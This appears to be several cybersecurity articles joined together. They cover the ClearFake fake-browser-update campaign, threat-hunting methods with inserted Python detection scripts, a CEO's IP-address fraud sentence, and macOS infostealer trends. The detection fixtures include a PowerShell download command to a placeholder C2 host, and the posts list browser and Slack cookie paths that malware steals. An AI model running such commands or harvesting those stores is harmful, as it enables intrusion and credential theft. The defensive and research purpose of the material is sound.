The Fake Browser Update Scam Gets a Makeover

One of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in the past few months. New research shows the attackers behind one such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.

Image: a fake warning that the Chrome browser needs to be updated, showing several devices (phone, monitor, etc.) open to Google and an enticing blue update button in the middle.

In August 2023, security researcher Randy McEoin blogged about a scam he dubbed ClearFake, which uses hacked WordPress sites to serve visitors with a page that claims you need to update your browser before you can view the content.

The fake browser alerts are specific to the browser you’re using, so if you’re surfing the Web with Chrome, for example, you’ll get a Chrome update prompt. Those who are fooled into clicking the update button will have a malicious file dropped on their system that tries to install an information stealing trojan.

Earlier this month, researchers at the Tel Aviv-based security firm Guardio said they tracked an updated version of the ClearFake scam that included an important evolution. Previously, the group had stored its malicious update files on Cloudflare, Guardio said.

But when Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and “smart contracts,” or coded agreements that execute actions automatically when certain conditions are met.

Nati Tal, head of security at Guardio Labs, the research unit at Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract’s functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

“These contracts offer innovative ways to build applications and processes,” Tal wrote along with his Guardio colleague Oleg Zaytsev. “Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted ‘on-chain’ without the ability for a takedown.”

Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact.

“So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces,” Tal said.
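As an added illustration (not code from Guardio or this article), the following Python heuristic scans a page's HTML for the pattern described above: an inline script that reads data from a blockchain JSON-RPC endpoint and then rewrites the page contents. The indicator strings and the sample HTML are assumptions constructed for the example, not published ClearFake indicators.

```python
"""Heuristic scanner for ClearFake-style injections in a page's HTML.

Added example, not Guardio's or KrebsOnSecurity's code. It looks for the
combination the article describes: an inline script that (1) reads data
from a blockchain JSON-RPC endpoint and (2) overwrites the page with a
browser-update lure. The indicator strings are assumptions for illustration,
not a published IoC list; the sample HTML is constructed.
"""
import re

# Assumed indicators. eth_call is the read-only JSON-RPC method used to query
# contract state without a transaction; bsc-dataseed.binance.org is a public
# BSC RPC host. Tune both lists to your own threat intelligence.
RPC_PATTERNS = [r"\beth_call\b", r"bsc-dataseed\d*\.binance\.org"]
DOM_OVERWRITE_PATTERNS = [
    r"document\.body\.innerHTML\s*=",
    r"document\.documentElement\.innerHTML\s*=",
    r"document\.write\s*\(",
]
LURE_PATTERNS = [r"update\s+your\s+browser", r"browser\s+update"]

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def _matches(patterns, text):
    """Return the patterns that match anywhere in text (case-insensitive)."""
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def scan_html(html):
    """Return one finding per inline script that looks like an injected lure loader.

    A script is flagged when it touches a blockchain RPC endpoint AND rewrites
    the DOM. Lure wording raises the score but is not required, because the
    lure text normally arrives inside the fetched payload, not the loader.
    """
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        rpc = _matches(RPC_PATTERNS, body)
        dom = _matches(DOM_OVERWRITE_PATTERNS, body)
        lure = _matches(LURE_PATTERNS, body)
        if rpc and dom:
            findings.append({
                "script_index": index,
                "rpc_indicators": rpc,
                "dom_indicators": dom,
                "lure_indicators": lure,
                "score": len(rpc) + len(dom) + len(lure),
            })
    return findings


# Constructed sample: a benign page script followed by a loader shaped like
# the article's description (placeholders only, not a real payload).
SAMPLE_HTML = """
<html><head>
<script>
  window.dataLayer = window.dataLayer || [];
  document.getElementById("year").innerText = new Date().getFullYear();
</script>
</head><body>
<script>
  fetch("https://bsc-dataseed.binance.org/", {method: "POST",
    body: JSON.stringify({jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{to: "CONTRACT_ADDRESS_PLACEHOLDER", data: "0x"}, "latest"]})})
  .then(r => r.json())
  .then(j => { document.body.innerHTML = decode(j.result); });
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"script #{f['script_index']} score={f['score']} "
              f"rpc={f['rpc_indicators']} dom={f['dom_indicators']}")
```

Run it over the rendered HTML of each page on a site you administer; a hit on a page whose source you did not change is the signal to inspect the WordPress installation.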

Attacker-controlled BSC addresses — from funding, contract creation, and ongoing code updates. Image: Guardio

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts.

“This model is designed to proactively identify and mitigate potential threats before they can cause harm,” BNB Smart Chain wrote. “The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible.”

Guardio says the crooks behind the BSC malware scheme are using the same malicious code as the attackers that McEoin wrote about in August, and are likely the same group. But a report published today by email security firm Proofpoint says the company is currently tracking at least four distinct threat actor groups that use fake browser updates to distribute malware.

Proofpoint notes that the core group behind the fake browser update scheme has been using this technique to spread malware for the past five years, primarily because the approach still works well.

“Fake browser update lures are effective because threat actors are using an end-user’s security training against them,” Proofpoint’s Dusty Miller wrote. “In security awareness training, users are told to only accept updates or click on links from known and trusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use JavaScript requests to quietly make checks in the background and overwrite the existing website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit and is now asking them to update their browser.”

More than a decade ago, this site published Krebs’s Three Rules for Online Safety, of which Rule #1 was, “If you didn’t go looking for it, don’t install it.” It’s nice to know that this technology-agnostic approach to online safety remains just as relevant today.

A Modern Approach to Adaptive Threat Hunting Methodologies

Threat hunting encompasses a range of techniques and approaches aimed at discovering anomalies, threats, and risks associated with attacker activities. In the early days, log review by diligent system administrators was how these anomalies were detected, usually after the fact. This evolved into more structured methodologies created by security experts that attempted to identify these activities in real time. In present day security operations, threat hunting initiatives have become a standard part of mature security programs, but few organizations have managed to establish the expertise and methodology to conduct these types of hunts with internal resources.

In this series, we will take a look at the components that make up well-known threat hunting methodologies, the evolution that reflects the growing need to proactively seek out and mitigate security threats rather than solely relying on reactive, manual measures, and some new adaptive approaches to conducting automated, wide ranging hunt capabilities.

Threat hunting, after all, involves implementing innovative methods of continuous monitoring and analysis of real-world activities to uncover hidden threats, making it an essential aspect of modern cybersecurity that should leverage every aspect of process, technology, and people available to defenders.

Traditional Methodologies

The approach advocated by threat hunting pioneers in the last decade emphasizes proactive cybersecurity practices. It involves the systematic and continuous search for hidden threats and anomalies within an organization’s environment, aiming to detect and mitigate potential breaches before they can cause damage.

In most cybersecurity practices, a robust approach involves utilizing a range of advanced tools. These tools encompass intrusion detection systems (IDS), Security Information and Event Management (SIEM) platforms, Endpoint Protection, Detection, & Response platforms (EPP/EDR), as well as threat intelligence feeds and security service providers. However, the effective application of these tools and services requires the expertise of seasoned cybersecurity professionals and highly tuned, effective tooling.

Experience allows security teams to leverage their knowledge, intuition, and subject matter expertise to interpret data and discern nuanced threats within logs, packets, flows, and trace activities. Some key elements found in traditional methodologies which deliver acceptable results but need to be constantly revisited and enhanced include:

  • Structured Methodology: important for identifying anomalies and potential threats in network traffic, endpoint telemetry, and system logs.
  • Continuous Monitoring: Real-time monitoring of network and system activities to detect suspicious or unusual behavior (security monitoring).
  • Hypothesis-Driven Analysis: Develop hypotheses about potential threats based on known attack patterns, trends, or indicators, then investigate these hypotheses to confirm or refute their suspicions (threat modeling).
  • Data Analysis: Scrutinizing large volumes of data, including network traffic logs, system logs, security controls’ logs, and other relevant data sources, to uncover indicators of compromise (analysis at scale).
  • Configuration analysis: Hunting for misconfigured devices, including incorrect policies, overreaching access, endpoints without installed security controls, etc. (system hardening).
  • Internal hunting: Identifying sensitive data, misconfigurations, plain text passwords, tokens stored or passed inappropriately, unauthorized access to critical systems, and abuse of user identities and service accounts (insider and environmental threats).
  • External hunting: Focused on identifying data and credential leaks and/or malware/hacking discovery using third-party services such as VirusTotal, Shodan, Dark Web searches, and external surface scanning (external threat).

A crucial aspect of being successful in cybersecurity is the team’s adaptability to the ever-evolving threat landscapes. Security teams must consistently refine their methodologies and remain updated on emerging threats and evolving attack techniques.

Equally important is fostering collaboration among various security teams, including network security, incident response, SOC/SOAR, vulnerability management, and threat intelligence teams. By sharing insights and findings, these teams collectively enhance their ability to protect against cyber threats effectively.

With the scale and speed at which attackers evolve today, defenders can no longer rely strictly on human intuition, manual horsepower, and traditional methodologies.

On the Hunt | SolarWinds SERV-U Vulnerability

Thanks to our WatchTower threat hunting team we can see an example of valuable threat hunting based on traditional methodologies when we take a look at the timeline and story of how exploiting the SolarWinds SERV-U Vulnerability was proven to be connected to the download, decryption, and execution of Cobalt Strike. This proves that a structured methodology supported with data analysis at scale and focused threat hunting can be successful in identifying exploitation of known vulnerabilities with traditional attack methods.

  1. In July 2021, SolarWinds released an advisory on Serv-U version 15.2.3. Microsoft stated that this CVE was used in limited, targeted attacks. After just a few days CISA also released an advisory that this vulnerability may allow a remote attacker to take control of an infected system even though it had not been identified performing such activities in the wild.

  2. Using Deep Visibility queries and Vigilance MDR analyst investigation, the SentinelOne WatchTower threat hunting team spotted abuse of the SolarWinds Serv-U vulnerability in an educational institution exhibiting anomalous behaviors such as spawning unusual child processes.
  3. The vulnerable Serv-U secure FTP process launched the command prompt and PowerShell to connect to a remote C2 at http://179[.]60[.]150[.]32/login. The C2 IP address was live and served the next level of encoded commands as of August 26, to further decrypt and execute Cobalt Strike in memory.
  4. The SentinelOne Agent successfully blocked and mitigated this attack before it could infect the target machine. Afterwards, it kicked off remediation and patching activities that likely should have been performed before the vulnerability was ever exploited.
  5. The idea is that a modern futuristic paradigm to threat hunting should get ahead of these types of threats and show attempts before they are able to get even this far.
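Added example (not SentinelOne's Deep Visibility query or code): a hypothesis-driven hunt over constructed process-creation events that walks the process tree rooted at Serv-U and flags any descendant shell, pulling URLs out of its command line. The field names, install path, host name and the C2 placeholder are assumptions.

```python
"""Hypothesis-driven hunt: Serv-U spawning command shells.

Added example, not SentinelOne's Deep Visibility query or code. The process
events below are constructed; the install path, host name and the C2 URL
(a placeholder under .invalid) are assumptions.
"""
import re
from dataclasses import dataclass

SERVU_IMAGES = {"serv-u.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    ts: str        # ISO 8601 timestamp
    host: str
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str


def basename(path):
    """Image name in lower case, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def servu_descendants(events):
    """Return the set of pids that descend (at any depth) from a Serv-U process.

    A fixed-point loop is used so that events need not be in chronological order.
    """
    roots = {e.pid for e in events if basename(e.image) in SERVU_IMAGES}
    descendants = set()
    changed = True
    while changed:
        changed = False
        for e in events:
            if e.pid in roots or e.pid in descendants:
                continue
            if e.ppid in roots or e.ppid in descendants:
                descendants.add(e.pid)
                changed = True
    return descendants


def hunt_servu_shells(events):
    """Flag any shell anywhere under Serv-U and extract URLs from its command line.

    Hypothesis: a file-transfer service has no business launching cmd.exe or
    PowerShell, so a shell in its subtree is an exploitation indicator worth triage.
    """
    by_pid = {e.pid: e for e in events}
    under_servu = servu_descendants(events)
    hits = []
    for e in events:
        if e.pid in under_servu and basename(e.image) in SHELLS:
            parent = by_pid.get(e.ppid)
            hits.append({
                "host": e.host,
                "ts": e.ts,
                "pid": e.pid,
                "image": basename(e.image),
                "parent": basename(parent.image) if parent else "unknown",
                "urls": URL_RE.findall(e.cmdline),
            })
    return hits


# Constructed telemetry: a normal Serv-U start, the suspicious chain, and a
# benign cmd.exe launched from Explorer (pid 2000) that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent("2021-08-26T10:00:00Z", "EDU-FTP01", 1200, 800,
              r"C:\Serv-U\Serv-U.exe", "Serv-U.exe"),
    ProcEvent("2021-08-26T10:05:10Z", "EDU-FTP01", 3301, 1200,
              r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -Command "Invoke-WebRequest http://c2.example.invalid/login"'),
    ProcEvent("2021-08-26T10:05:11Z", "EDU-FTP01", 3302, 3301,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -Command "Invoke-WebRequest http://c2.example.invalid/login"'),
    ProcEvent("2021-08-26T10:07:00Z", "EDU-FTP01", 4100, 2000,
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for hit in hunt_servu_shells(SAMPLE_EVENTS):
        print(hit)
```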

Modern Futuristic Paradigm

The vision of a modern and futuristic threat hunting paradigm involves leveraging advanced technologies and methodologies to enhance security operations and stay ahead of cyber threats. In this paradigm, threat hunting becomes a central focus of Security Operations Centers (SOCs) augmented by service providers and threat experts. Internal and external teams continually conduct research on known and emerging threats, vulnerabilities, and attack techniques for attribution and correlation. This research is then operationalized to proactively identify potential threats and vulnerabilities within an organization’s environment.

Automation plays a pivotal role in this vision. Routine and repetitive tasks are automated to free up security analysts’ time for more strategic activities. Automation can include the automatic collection and analysis of threat intelligence, the correlation of security events, extraction of indicators of compromise (IoCs), and the orchestration of incident response workflows.

Adapting to Changing Security Threats

Adaptive threat hunting is a dynamic approach to proactive anomaly discovery that evolves alongside the ever-changing threat landscape. It recognizes that threats can emerge from various sources, and it goes beyond traditional threat hunting by incorporating offensive inputs, novel research, and a range of hunting strategies.

Threat hunting should include real-time strategies that address emerging threats in the present; retroactive hunts, which delve into historical data for hidden threats; artifact-based searches, which examine digital traces left by attackers; and Hunts of Hunts, which identify the overarching strategies and tactics employed by adversaries based on chained detections, with a multi-directional approach to threat attribution.

By embracing these adaptable methods, organizations can strengthen their security postures and better protect against a diverse array of threats. Over this series of blogs we will introduce a modern approach and futuristic paradigm to threat hunting that allows us to stay ahead of the adversary and explore previous hunts analyzing the factors that made them successful. Key aspects of this vision include:

  • Multi-directional Approach: A variety of techniques, data sources, and methodologies used to comprehensively understand an organization’s security posture. By leveraging diverse telemetry, sweeps and scans, and LFO (Low Frequency of Occurrence) statistical analysis, you can identify patterns in seemingly unrelated data.
  • Chained Detections: Involves a sequence of automated tasks triggered by an initial detection to triage and enrich telemetry data progressively from disparate data sources. This approach is a proactive and sophisticated way to uncover and respond to complex threats and threat actors.
  • AI and Machine Learning: Artificial Intelligence (AI) and Machine Learning (ML) methods and techniques are integrated into threat hunting processes. These technologies can analyze vast amounts of data, identify anomalies, and detect subtle patterns indicative of potential threats. Machine learning can identify potential threats in reams of seemingly innocuous data by autonomously formulating patterns that lead to malicious behavior, based on statistical event mapping. Generative AI threat hunting can also help security teams detect and respond to threats faster and more accurately.
  • Threat Intelligence Integration: Threat hunting teams integrate internal and external intelligence feeds into their platforms. Threat intelligence platforms and Information Sharing and Analysis Centers (ISACs) facilitate the exchange of threat data and insights, enabling organizations to benefit from collective knowledge. This includes information on known threats, indicators of compromise (IoCs), and emerging attack tactics.
  • Adaptive Continuous Hunting: The security posture is adaptive and responsive. Threat hunting is not a one-time event but an ongoing, adaptive process. Security controls, policies, and threat hunting strategies are continuously adjusted based on evolving threats and the organization’s risk profile.
  • Incident Response Orchestration: Automated incident response orchestration and playbooks (such as those configurable in a SOAR or XDR platform) are used to streamline and accelerate response efforts. Security teams can respond to threats more effectively and consistently with predefined workflows.

A Modern Approach to Hunting

In this modern paradigm, the SOC’s role expands beyond reactive incident response to include proactive research, automated processes, and advanced technologies. There have been many attempts to tackle this problem, including Risk Based Alerting, clustering, baselining, allowlisting/denylisting, data normalization, tokenization, and additional data enrichment strategies, but there are more highly effective methods that we will continue to describe over the next few blog posts.

The goal is to create a resilient security posture capable of defending against a constantly evolving threat landscape with minimal impact on internal resources and security operations.

Akira Ransomware Campaign Highlights

Now we will show the results of a more extensive and modern hunt that yielded threat attribution and a higher level of fidelity and accuracy in identifying the risk and threat actors involved in an attack highlighting the Akira Ransomware Campaign. This was identified by our Vigilance DFIR team working closely with our WatchTower threat hunting team.

Akira ransomware operations were first observed in early 2023, with all the features and assets we expect from modern ransomware families. This included a victim blog site, multi-platform payloads, and even retro-style branding. Once access is achieved, Akira focuses on stealing confidential documents, destroying backups, disabling security settings, and performing other nefarious activities leading to the extortion of the victim for a handsome ransom.

The following steps lay out the effectiveness of a multi-directional approach that is adaptive and leverages different sources of data intelligence to paint a full picture of a threat actor.

  1. During an Akira incident we identified the group was downloading RustDesk, a remote access and remote control software available for different platforms. Notably, Akira had previously been associated with AnyDesk for persistence and C2 tasks, not the RustDesk RMM tool. The group then proceeded to create services, disable the firewall, and allow remote connections from Akira operators.
  2. Internal recon leveraged Advanced IP Scanner and NETSCAN.EXE for mapping the network, along with WinSCP for data exfiltration. They proceeded to access and manipulate SQL databases for the purpose of mapping users, data, and environment.
  3. The threat actor even went so far as to disable LSA (Local Security Authority) settings which help defend Windows users against credential theft by preventing untrusted code from being injected into the LSASS.exe process, disabling protections built into Windows.
  4. While cross-referencing Akira victim blog data with Shodan data, it appeared that Cisco VPN gateways belonging to targeted victim organizations were also listed. This suggests that Akira ransomware operators may be exploiting a vulnerability in Cisco VPN software to gain initial access. There is also evidence of stolen credentials acquired via IABs (Initial Access Brokers) being used.
  5. Detecting and blocking this ransomware at the endpoint is the last line of defense. Once a detection is made, that should then turn into actionable intelligence that leads to other investigative directions that help us anticipate attackers’ next steps.
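Added example (not SentinelOne's code) that serves both the multi-directional approach and chained detections bullets above and the Akira steps just listed: LFO stacking of process names across a host population surfaces rarely seen tools such as RustDesk, NETSCAN.EXE and WinSCP, and a chained step then enriches each hit with the follow-on behaviours the case describes (service creation, firewall disabled, LSA protection disabled) inside a time window. The telemetry is constructed and already normalized; host names, thresholds and the event-type vocabulary are assumptions.

```python
"""LFO stacking with a chained detection, in the spirit of the multi-directional
approach and the Akira case above.

Added example, not SentinelOne's code. The telemetry is constructed and already
normalized to (timestamp, host, event_type, detail); host names, thresholds and
the event-type vocabulary are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Follow-on behaviours the Akira write-up describes after the RMM tool lands.
FOLLOW_ON = {"service_created", "firewall_disabled", "lsa_protection_disabled"}

# Constructed fleet of five hosts. explorer.exe and outlook.exe are everywhere;
# WS-17 shows the Akira-style chain, SRV-DB and WS-03 each run one rare but
# unchained process so the severity tiers can be compared.
EVENTS = [
    ("2023-09-01T09:00:00", "WS-01", "process", "explorer.exe"),
    ("2023-09-01T09:01:00", "WS-01", "process", "outlook.exe"),
    ("2023-09-01T09:00:00", "WS-02", "process", "explorer.exe"),
    ("2023-09-01T09:01:00", "WS-02", "process", "outlook.exe"),
    ("2023-09-01T09:00:00", "WS-03", "process", "explorer.exe"),
    ("2023-09-01T09:01:00", "WS-03", "process", "outlook.exe"),
    ("2023-09-01T09:30:00", "WS-03", "process", "zoom.exe"),
    ("2023-09-01T09:00:00", "WS-17", "process", "explorer.exe"),
    ("2023-09-01T09:01:00", "WS-17", "process", "outlook.exe"),
    ("2023-09-01T10:00:00", "WS-17", "process", "rustdesk.exe"),
    ("2023-09-01T10:05:00", "WS-17", "service_created", "RustDesk Service"),
    ("2023-09-01T10:12:00", "WS-17", "firewall_disabled", "all profiles"),
    ("2023-09-01T10:30:00", "WS-17", "lsa_protection_disabled", "LSA protection off"),
    ("2023-09-01T10:45:00", "WS-17", "process", "netscan.exe"),
    ("2023-09-01T11:10:00", "WS-17", "process", "winscp.exe"),
    ("2023-09-01T09:00:00", "SRV-DB", "process", "explorer.exe"),
    ("2023-09-01T09:01:00", "SRV-DB", "process", "outlook.exe"),
    ("2023-09-01T14:00:00", "SRV-DB", "process", "winscp.exe"),
]


def lfo_processes(events, max_hosts=2):
    """Stack process names by distinct-host count and keep only the rare ones.

    max_hosts is an absolute count to keep the example small; on a real fleet
    use a fraction of the host population instead.
    """
    hosts_by_proc = defaultdict(set)
    for _, host, kind, detail in events:
        if kind == "process":
            hosts_by_proc[detail.lower()].add(host)
    return {proc: sorted(hosts) for proc, hosts in hosts_by_proc.items()
            if len(hosts) <= max_hosts}


def chain_detections(events, window=timedelta(hours=2), max_hosts=2):
    """One alert per host: the first rare process is the initial detection and
    the enrichment step gathers other rare tools and follow-on events in window.

    Severity: high when two or more distinct follow-on behaviours appear,
    medium for one follow-on or several rare tools, low for a lone rare tool.
    """
    rare = lfo_processes(events, max_hosts)
    parsed = sorted((datetime.fromisoformat(ts), host, kind, detail)
                    for ts, host, kind, detail in events)
    alerts = []
    for host in sorted({e[1] for e in parsed}):
        mine = [e for e in parsed if e[1] == host]
        triggers = [e for e in mine if e[2] == "process" and e[3].lower() in rare]
        if not triggers:
            continue
        start = triggers[0][0]
        end = start + window
        tools = sorted({e[3].lower() for e in triggers if e[0] <= end})
        follow = sorted({e[2] for e in mine
                         if e[2] in FOLLOW_ON and start <= e[0] <= end})
        if len(follow) >= 2:
            severity = "high"
        elif follow or len(tools) >= 2:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"host": host, "first_seen": start.isoformat(),
                       "rare_tools": tools, "follow_on": follow,
                       "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in chain_detections(EVENTS):
        print(alert)
```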

In this case, new tactics and techniques were identified and attributed to a threat actor based on adaptive, continuous threat hunting and external threat analysis. Researching, analyzing, understanding, and hunting for this attack chain enabled our hunters to proactively hunt for similar activity and block it before it became a true threat. Subsequent hunts in other organizations allowed us to detect early and prevent many breaches.

Conclusion

The importance of creating business value through threat hunting in today’s complex and rapidly evolving cybersecurity landscape cannot be overstated. With the proliferation of AI, Cloud, SaaS, IoT, containers, growing market share of macOS, and omnipresent mobile devices, along with the challenges posed by regulated markets and remote work environments, organizations are facing a detection world that has become incredibly intricate. In response to these complexities, it makes strategic sense for many organizations to outsource advanced threat hunting and analysis to specialized security vendors to augment their own capabilities.

The reasons for this shift towards outsourcing this function to expert threat hunters as opposed to having a dedicated threat hunting team are compelling. Detection engineering has matured, and organizations are recognizing that a ‘build’ mentality often leads to playing catch-up with emerging threats. By ‘buying’ the expertise of a security vendor, organizations can leverage the vendor’s multidisciplinary team, which is exposed to new threats and tactics on a daily basis, often well ahead of in-house security teams. This proactive approach reduces the organization’s exposure to risks and accelerates threat response capabilities.

Additionally, the total cost of ownership is significantly lower with a managed service compared to maintaining a salaried internal team with limited expertise. Reliable threat hunting partners provide access to a larger pool of specialized skills as well as access to large data sets of rich telemetry across disparate endpoints and malware tactics. Internal staff can be augmented to enhance the organization’s security posture without the overhead of hiring and training more personnel. The risk of not conducting threat hunting is clear, and even with security tools that offer tremendous quantities of telemetry, it’s essential to have experts process this data to maximize its benefits, predicting the attack instead of just preventing it.

Learn More About WatchTower

For enterprises looking for a threat hunting partner to help them implement a robust methodology to stand up to emergent threats, SentinelOne’s WatchTower provides threat hunting experts equipped with the latest threat intelligence and AI/machine learning algorithms.

Today, customers can use WatchTower to achieve real-time and retroactive detections of anomalous activity across their enterprise to proactively address evolving threats and strengthen their security posture. Learn more about what WatchTower can do for your enterprise here.

Special thanks to the entire WatchTower, Vigilance, and DFIR teams for contributions in findings, analysis, and content.

Tech CEO Sentenced to 5 Years in IP Address Scheme

Amir Golestan, the 40-year-old CEO of the Charleston, S.C. based technology company Micfo LLC, has been sentenced to five years in prison for wire fraud. Golestan’s sentencing comes nearly two years after he pleaded guilty to using an elaborate network of phony companies to secure more than 735,000 Internet Protocol (IP) addresses from the American Registry for Internet Numbers (ARIN), the nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

Amir Golestan, the former CEO of Micfo.

In 2018, ARIN sued Golestan and Micfo, alleging they had obtained hundreds of thousands of IP addresses under false pretenses. ARIN and Micfo settled that dispute in arbitration, with Micfo returning most of the addresses that it hadn’t already sold.

ARIN’s civil case caught the attention of federal prosecutors in South Carolina, who in May 2019 filed criminal wire fraud charges against Golestan, alleging he’d orchestrated a network of shell companies and fake identities to prevent ARIN from knowing the addresses were all going to the same buyer.

Prosecutors showed that each of those shell companies involved the production of notarized affidavits in the names of people who didn’t exist. As a result, the government was able to charge Golestan with 20 counts of wire fraud — one for each payment made by the phony companies that bought the IP addresses from ARIN.

Golestan initially sought to fight those charges. But on just the second day of his trial in November 2021, Golestan changed his mind and pleaded guilty to 20 counts of wire fraud in connection with the phantom companies he used to secure the IP addresses. Prosecutors estimated those addresses were valued at between $10 million and $14 million.

ARIN says the 5-year sentence handed down by the South Carolina judge “sends an important message of deterrence to other parties contemplating fraudulent schemes to obtain or transfer Internet resources.”

“Those who seek to defraud ARIN (or other Regional Internet Registries) are subject to costly and serious civil litigation, criminal charges, and, ultimately, a lengthy term of incarceration,” reads a statement from ARIN on Golestan’s sentencing.

By 2013, a number of Micfo’s customers had landed on the radar of Spamhaus, a group that many network operators rely upon to stem the tide of junk email. Shortly after Spamhaus started blocking Micfo’s IP address ranges, Micfo shifted gears and began reselling IP addresses mainly to companies marketing “virtual private networking” or VPN services that help customers hide their real IP addresses online.

Golestan did not respond to a request for comment. But in a 2020 interview with KrebsOnSecurity, Golestan claimed that Micfo was at one point responsible for brokering roughly 40 percent of the IP addresses used by the world’s largest VPN providers. Throughout that conversation, Golestan maintained his innocence, even as he explained that the creation of the phony companies was necessary to prevent entities like Spamhaus from interfering with his business going forward.

There are fewer than four billion so-called “Internet Protocol version 4” or IPv4 addresses available for use, but the vast majority of them have already been allocated. The global dearth of available IP addresses has turned them into a commodity wherein each IPv4 address can fetch between $15-$25 on the open market.

This has led to boom times for those engaged in the acquisition and sale of IP address blocks, but it has likewise emboldened those who specialize in absconding with and spamming from dormant IP address blocks without permission from the rightful owners.

The U.S. Department of Justice says Golestan will serve 60 months in prison, followed by a 2-year term of court-ordered supervision. The Micfo CEO also was ordered to pay nearly $77,000 in restitution to ARIN for its work in assisting federal prosecutors.

macOS Malware 2023 | A Deep Dive into Emerging Trends and Evolving Techniques

Last week saw Apple update XProtect to version 2173 with new rules for Atomic Stealer and Adload. As we have noted previously, Apple’s defenses for the Mac have been evolving of late, with increased attention on remediation and some prototype behavioral rules that appear to still be in testing mode.

However, 2023 to date has seen new approaches to compromising Macs that continue to leave macOS users at risk if organizations are not taking additional measures to defend against them.

In this post, we look at some of the major macOS malware discovered recently and detail how threat actors are adapting and evolving to ensure successful compromise when targeting Apple’s desktop platform.

Persistence No Longer a Priority for Mac Infostealers

Perhaps one of the most significant changes we’ve seen in 2023 is the multitude of macOS malware families that eschew persistence. This is especially characteristic of infostealers, which aim to achieve all their objectives in one execution – stealing the user’s admin passwords, browsing data, session cookies and keychain, and then exfiltrating these off to a remote server.

With such a haul, the attackers have no need for persistence, as they now have access to any cloud or SaaS accounts that the user had stored credentials and cookies for on their local device.

~/Library/Cookies/*.binarycookies

Chrome:  ~/Library/Application Support/Google/Chrome/Default/Cookies
Firefox: ~/Library/Application Support/Firefox/Profiles/[Profile Name]/
Slack:   ~/Library/Application Support/Slack/Cookies (file)
         ~/Library/Application Support/Slack/storage/*
         ~/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/storage

Other recent malware families abjure traditional persistence mechanisms in favor of trojanizing software that they expect the user to run regularly, in effect making the user’s own behavior the means of persistence. A good example of this, as we’ll discuss further below, was the March 2023 compromise of 3CX.

With no need to schedule execution of the malware through system services, detection becomes problematic for certain kinds of security mechanisms, and Apple’s recent introduction of pushing user notifications to warn when background items are scheduled is rendered irrelevant.

Organizations Compromised Through Targeted Social Engineering

Threat actors have begun using more sophisticated social engineering techniques to compromise Mac users. Although much common malware is distributed through channels such as torrent sharing sites and third-party software download sites, threat actors looking to compromise businesses are developing highly targeted campaigns.

Earlier in 2023 we saw how RustBucket malware targeted organizations with specially crafted applications that victims were persuaded into executing as part of an elaborate social engineering scheme. Threat actors engaged victims with the promise of a business deal and shared ‘confidential’ PDF documents that could not be read by ordinary PDF viewer software.

To view the documents ‘securely’, victims were encouraged to download a ‘proprietary’ application named ‘Internal PDF Viewer’. Convinced that the software was required to maintain the secrecy of the deal, users were persuaded to override Apple’s built-in security mechanisms. The malicious PDF viewer displayed the document the victim was expecting to see but in the background downloaded and executed malware from the attacker’s C2.

RustBucket Stage 2 downloads the next stage of the attack via curl

Less-sophisticated but still targeted malware has also been spotted this year aiming at small businesses and freelance contractors. The macOS MetaStealer campaign targeted victims with social engineering lures like “Advertising terms of reference” and “Brief_Presentation-Task_Overview”. These files were in fact disk images containing infostealer malware disguised as PDF documents.

As with RustBucket, the aim was to incentivize users to override Apple’s macOS security mechanisms, which unfortunately means little more than convincing them to right-click a file and choose ‘open’ rather than double-clicking it.

Increased Use of Public Offensive Security Tools

Controversy has long swirled around offensive security tools in the Windows world, particularly Cobalt Strike, which has been cracked and leaked so widely that it is now a mainstay of attackers of all stripes. The same trend is now starting to be seen in the macOS malware world, too.

Projects like Geacon wrap Cobalt Strike capabilities in Go-based payloads. These have been seen embedded in fake versions of enterprise level apps like SecureLink beaconing out to C2s in China and using job resumés as decoys.

Highly-regarded open source red teaming tool Mythic and its various payloads, particularly Poseidon, for example, have also been seen in recent macOS malware campaigns.

Poseidon and Mythic function as an implant and C2 administration suite much the same way as Cobalt Strike does. With built in obfuscation and encrypted communications, Poseidon provides attackers with a powerful toolkit.

